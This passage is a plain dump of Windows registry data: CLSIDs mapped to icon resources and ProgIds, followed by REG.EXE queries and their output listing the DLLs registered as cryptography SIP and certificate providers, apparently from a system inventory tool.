{3080F90E-D7AD-11D9-BD98-0000947B0257} %SystemRoot%\explorer.exe,-258 {3134ef9c-6b18-4996-ad04-ed5912e00eb5} %SystemRoot%\system32\imageres.dll,-117 {323CA680-C24D-4099-B94D-446DD2D7249E} %SystemRoot%\system32\imageres.dll,-1024 {328B0346-7EAF-4BBE-A479-7CB88A095F5B} %SystemRoot%\system32\imageres.dll,-27 LayoutFolder {374DE290-123F-4565-9164-39C4925E467B} %SystemRoot%\system32\imageres.dll,-184 {38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B} %SystemRoot%\system32\imageres.dll,-171 {3936E9E4-D92C-4EEE-A85A-BC16D5EA0819} %SystemRoot%\system32\shell32.dll,-37219 {3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA} %SystemRoot%\system32\imageres.dll,-113 {3dfdf296-dbec-4fb4-81d1-6a3438bcf4de} %SystemRoot%\system32\imageres.dll,-108 {3f6bc534-dfa1-4ab4-ae54-ef25a74e0107} %SystemRoot%\System32\rstrui.exe,0 {40419485-C444-4567-851A-2DD7BFA1684D} %SystemRoot%\System32\telephon.cpl,-100 {430da762-8632-4840-bc61-3eeaa078e62e} %SystemRoot%\system32\display.dll,1 {450D8FBA-AD25-11D0-98A8-0800361B1103} %SystemRoot%\system32\shell32.dll,-235 {48123BC4-99D9-11D1-A6B3-00C04FD91555} %SystemRoot%\System32\msxml3.dll,0 xmlfile {4c892621-6757-4fe0-ad8c-a6301be7fba2} %SystemRoot%\system32\themeui.dll,7 {5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0} %SystemRoot%\system32\imageres.dll,-27 {58E3C745-D971-4081-9034-86E34B30836A} %SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll,-1 {59031a47-3f72-44a7-89c5-5595fe6b30ee} %SystemRoot%\system32\imageres.dll,-123 {5ea4f148-308c-46d7-98a9-49041b1dd468} %SystemRoot%\system32\mblctr.exe,0 {5ED4F38C-D3FF-4D61-B506-6820320AEBFE} %SystemRoot%\System32\imageres.dll,-27 {5ef4af3a-f726-11d0-b8a2-00c04fc309a4} %SystemRoot%\system32\shell32.dll,-33 {60632754-c523-4b62-b45c-4172da012619} %SystemRoot%\System32\usercpl.dll,-1 {60F6E464-4DEF-11d2-B2D9-00C04F8EEC8C} %SystemRoot%\System32\DATACLEN.DLL,-2002 {62D8ED13-C9D0-4CE8-A914-47DD628FB1B0} %SystemRoot%\System32\intl.cpl,-200 {6377013E-2C35-40F3-B8E1-1AB47D12982B} %SystemRoot%\system32\WABSyncProvider.dll,0 {63da6ec0-2e98-11cf-8d82-444553540000} %SystemRoot%\system32\imageres.dll,-73 {645FF040-5081-101B-9F08-00AA002F954E} %SystemRoot%\System32\imageres.dll,-55 {67718415-c450-4f3c-bf8a-b487642dc39b} %SystemRoot%\system32\imageres.dll,-87 {679f85cb-0220-4080-b29b-5540cc05aab6} %SystemRoot%\system32\shell32.dll,-51380 {67CA7650-96E6-4FDD-BB43-A8E774F73A57} %SystemRoot%\System32\imageres.dll,-1013 {6C8EEC18-8D75-41B2-A177-8831D59D2D50} %SystemRoot%\System32\main.cpl,-100 {6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} %SystemRoot%\system32\imageres.dll,-166 {7007ACC7-3202-11D1-AAD2-00805FC1270E} %SystemRoot%\system32\netshell.dll {725BE8F7-668E-4C7B-8F90-46BDB0936430} %SystemRoot%\System32\main.cpl,-200 {73FDDC80-AEA9-101A-98A7-00AA00374959} "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE",1 WordPad.Document.1 {74246bfc-4c96-11d0-abef-0020af6b0b7a} %SystemRoot%\system32\devmgr.dll,-201 {7A9D77BD-5403-11d2-8785-2E0420524153} %SystemRoot%\system32\netplwiz.dll,-102 {7b81be6a-ce2b-4676-a29e-eb907a5126c5} %SystemRoot%\system32\imageres.dll,-87 {80F3F1D5-FECA-45F3-BC32-752C152E456E} %SystemRoot%\System32\tabletpc.cpl,-10200 {863aa9fd-42df-457b-8e4d-0de1b8015c60} %SystemRoot%\System32\imageres.dll,-26 {87D66A43-7B11-4A28-9811-C86EE395ACF7} %SystemRoot%\System32\srchadmin.dll,-201 {888DCA60-FC0A-11CF-8F0F-00C04FD7D062} %SystemRoot%\system32\zipfldr.dll {89D83576-6BD1-4c86-9454-BEB04E94C819} %systemroot%\system32\mssvp.dll,-504 {8E908FC9-BECC-40f6-915B-F4CA0E70D03D} %SystemRoot%\System32\netcenter.dll,-1 {8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA} %systemroot%\system32\dxp.dll,0 {9324DA94-50EC-4A14-A770-E90CA03E7C8F} %SystemRoot%\system32\themeui.dll,7 {93412589-74D4-4E4E-AD0E-E0CB621440FD} %SystemRoot%\System32\fontext.dll {9343812e-1c37-4a49-a12e-4b2d810d956b} %SystemRoot%\System32\searchfolder.dll,-323 {98F275B4-4FFF-11E0-89E2-7B86DFD72085} %SystemRoot%\system32\SearchFolder.dll,-323 {992CFFA0-F557-101A-88EC-00DD010CCC48} %SystemRoot%\system32\netshell.dll {9C60DE1E-E5FC-40f4-A487-460851A8D915} %SystemRoot%\System32\autoplay.dll,-1 {9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF} %SystemRoot%\System32\SyncCenter.dll,-1000 {9DB7A13C-F208-4981-8353-73CC61AE2783} %SystemRoot%\system32\twext.dll,-100 Previous.Versions {9E56BE60-C50F-11CF-9A2C-00A0C90A90CE} %SystemRoot%\system32\sendmail.dll,-2001 {9E56BE61-C50F-11CF-9A2C-00A0C90A90CE} %SystemRoot%\system32\imageres.dll,-110 {9FE63AFD-59CF-4419-9775-ABCC3849F861} %SystemRoot%\System32\imageres.dll,-1022 {a00ee528-ebd9-48b8-944a-8942113d46ac} %SystemRoot%\system32\SearchFolder.dll,-323 {A0953C92-50DC-43bf-BE83-3742FED03C9C} %SystemRoot%\system32\imageres.dll,-189 {A8A91A66-3A7D-4424-8D24-04E180695C7A} %systemroot%\system32\DeviceCenter.dll,-1 {A8CDFF1C-4878-43be-B5FD-F8091C1C60D0} %SystemRoot%\system32\imageres.dll,-112 {A9B48EAC-3ED8-11d2-8216-00C04FB687DA} %SystemRoot%\System32\DATACLEN.DLL,-2000 {ADB9F5A4-E73E-49b8-99B6-2FA317EF9DBC} %SystemRoot%\system32\themeui.dll,7 {AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E} %SystemRoot%\System32\cscui.dll {B12AE898-D056-4378-A844-6D393FE37956} %SystemRoot%\system32\themeui.dll,7 {B4BFCC3A-DB2C-424C-B029-7FE99A87C641} %SystemRoot%\system32\imageres.dll,-183 {B4FB3F98-C1EA-428d-A78A-D1F5659CBA93} %SystemRoot%\system32\imageres.dll,-1013 {B7BBD408-F09C-4aa8-B65E-A00B8FE0F0B9} %SystemRoot%\system32\themeui.dll,7 {B98A2BEA-7D42-4558-8BD1-832F41BAC6FD} %SystemRoot%\System32\sdcpl.dll,-1 {BA126E01-2166-11D1-B1D0-00805FC1270E} %SystemRoot%\system32\netshell.dll {BA126F01-2166-11D1-B1D0-00805FC1270E} %SystemRoot%\system32\netshell.dll {BB06C0E4-D293-4f75-8A90-CB05B6477EEE} %SystemRoot%\System32\imageres.dll,-149 {BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} %SystemRoot%\System32\ActionCenterCPL.dll,-1 {BC48B32F-5910-47F5-8570-5074A8A5636A} %SystemRoot%\System32\SyncCenter.dll,-1000 {BD7A2E7B-21CB-41b2-A086-B309680C6B7E} %systemroot%\system32\mssvp.dll,-505 {BD84B380-8CA2-1069-AB1D-08000948F534} %SystemRoot%\System32\fontext.dll {c57a6066-66a3-4d91-9eb9-41532179f0a5} %SystemRoot%\system32\imageres.dll,-1020 {C58C4893-3BE0-4B45-ABB5-A63E4B8C8651} %SystemRoot%\System32\DiagCpl.dll,-1 {c79d1575-b8c6-4862-a284-788836518b97} %SystemRoot%\system32\display.dll,1 {d0da2915-3f89-4519-a4ca-5e02528c8ec4} %SystemRoot%\system32\playlistfolder.dll {D17D1D6D-CC3F-4815-8FE3-607E7D5D10B3} %SystemRoot%\System32\Speech\SpeechUX\sapi.cpl,-138 {D2035EDF-75CB-4EF1-95A7-410D9EE17170} dlnashext.dll,-200 {D20EA4E1-3957-11d2-A40B-0C5020524153} %SystemRoot%\System32\imageres.dll,-114 {d3162b92-9365-467a-956b-92703aca08af} %SystemRoot%\system32\imageres.dll,-112 {D3E34B21-9D75-101A-8C3D-00AA001A1652} %systemroot%\system32\mspaint.exe,-3 Paint.Picture {D4480A50-BA28-11d1-8E75-00C04FA31A86} %SystemRoot%\System32\shwebsvc.dll,-107 {d450a8a1-9568-45c7-9c0e-b4f9fb4537bd} appwiz.cpl,-1507 {D555645E-D4F8-4c29-A827-D93C859C4F2A} %SystemRoot%\System32\accessibilitycpl.dll,-1 {D9EF8727-CAC2-4e60-809E-86F80A666C91} %SystemRoot%\System32\fvecpl.dll,-1 {daf95313-e44d-46af-be1b-cbacea2c3065} %SystemRoot%\system32\SearchFolder.dll,-323 {E2E7934B-DCE5-43C4-9576-7FE4F75E7480} %SystemRoot%\System32\timedate.cpl,-50 {e345f35f-9397-435c-8f95-4e922c26259e} %SystemRoot%\system32\SearchFolder.dll,-323 {E413D040-6788-4C22-957E-175D1C513A34} %SystemRoot%\System32\SyncCenter.dll,-1000 {E44E5D18-0652-4508-A4E2-8A090067BCB0} %SystemRoot%\system32\imageres.dll,-24 {E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31} %SystemRoot%\system32\zipfldr.dll CompressedFolder {E96F5460-09CE-4f46-88B1-F4B6B4A8E252} %SystemRoot%\system32\wmploc.dll, 101 {ECF03A32-103D-11d2-854D-006008059367} %SystemRoot%\system32\imageres.dll,-1002 {ED7BA470-8E54-465E-825C-99712043E01C} %SystemRoot%\System32\imageres.dll,-27 {ED834ED6-4B5A-4bfe-8F11-A626DCB6A921} %SystemRoot%\System32\themecpl.dll,-1 {F02C1A0D-BE21-4350-88B0-7367FC96EF3C} %SystemRoot%\System32\imageres.dll,-25 {F1390A9A-A3F4-4E5D-9C5F-98F3BD8D935C} %SystemRoot%\System32\SyncCenter.dll,-1000 {F20DA720-C02F-11CE-927B-0800095AE340} %SystemRoot%\system32\packager.dll,0 Package {F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D} %SystemRoot%\System32\mmsys.cpl,-100 {F5078F40-C551-11D3-89B9-0000F81FE221} %SystemRoot%\System32\msxml3.dll,0 xmlfile {F6B6E965-E9B2-444B-9286-10C9152EDBC5} %SystemRoot%\System32\FileHistory.exe {F82DF8F7-8B9F-442E-A48C-818EA735FF9B} %SystemRoot%\System32\tabletpc.cpl,-10201 {f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a} %SystemRoot%\system32\imageres.dll,-189 {FF3AE31D-55B0-4945-BDE9-622ABB334C1A} %SystemRoot%\system32\WABSyncProvider.dll,0 ComponentId ProgId ToolBoxBitmap32 {04a1e553-fe36-4fde-865e-344194e69424} msinkaut.InkPicture.1 %CommonProgramFiles%\Microsoft Shared\Ink\InkObj.dll, 212 {289228DE-A31E-11D1-A19C-0000F875B132} ListPad.ListPad.1 cic.dll, 1 {44F9A03B-A3EC-4F3B-9364-08E0007F21DF} Control.TaskSymbol.1 mmcndmgr.dll, 101 {545AE700-50BF-11D1-9FE9-00600832DB4A} MMCCtrl.MMCCtrl.1 cic.dll, 1 {5828227c-20cf-4408-b73f-73ab70b8849f} RdpCoreTS.WRdsProtocolManager.1 %windir%\system32\rdpcorets.dll, 1 {6BF52A52-394A-11d3-B153-00C04F79FAA6} WMPlayer.OCX.7 %SystemRoot%\system32\wmploc.dll, 101 {850D1D11-70F3-4BE5-9A11-77AA6B2BB201} WIA.CommonDialog.1 %SystemRoot%\System32\wiaaut.dll, 102 {9BA05971-F6A8-11CF-A442-00A0C90A8F39} Shell.FolderView.1 %SystemRoot%\system32\shell32.dll, 260 {AEB84C83-95DC-11D0-B7FC-B61140119C4A} DiskManagement.Control %SystemRoot%\System32\dmview.ocx,1 {B0395DA5-6A15-4E44-9F36-9A9DC7A2F341} MMC.IconControl.1 mmcndmgr.dll, 1 {C3701884-B39B-11D1-9D68-00C04FC30DF6} OlePrn.OleInstall.1 %SystemRoot%\system32\oleprn.dll, 1 {C47195EC-CD7A-11D1-8EA3-00C04F9900D7} SysColorCtrl.SysColorCtrl.1 cic.dll, 1 {E1C5D730-7E97-4D8A-9E42-BBAE87C2059F} WIA.DeviceManager.1 %SystemRoot%\System32\wiaaut.dll, 103
Cryptography providers:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /S /V "Dll" REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /S /V "$DLL"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\AggregateSSLHandshakeTime\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\SecureTimeAggregator.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllLogMismatchPinRules\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\cryptui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16 Dll REG_SZ C:\Windows\System32\cryptnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap Dll REG_SZ C:\Windows\System32\cryptnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllProtectedRootMessageBox\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\cryptui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllProtectPrompt\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\cryptui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\System32\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\System32\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\System32\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\System32\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 